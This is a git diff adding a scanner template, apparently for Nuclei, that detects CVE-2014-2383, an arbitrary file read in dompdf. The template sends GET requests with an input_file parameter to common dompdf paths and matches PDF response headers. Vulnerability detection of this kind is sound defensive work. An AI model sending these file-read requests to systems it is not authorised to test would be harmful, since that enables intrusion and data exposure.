diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml new file mode 100644 index 0000000000..b63246505f --- /dev/null +++ b/cves/2014/CVE-2014-2383.yaml @@ -0,0 +1,28 @@ +id: arbitrary-file-read-in-dompdf + +info: + name: Arbitrary file read in dompdf < v0.6.0 + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/33004 + tags: dompdf,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" + - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" + - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" + + matchers-condition: and + matchers: + - type: word + words: + - "application/pdf" + - 'filename="dompdf_out.pdf"' + part: header + condition: and + + - type: status + status: + - 200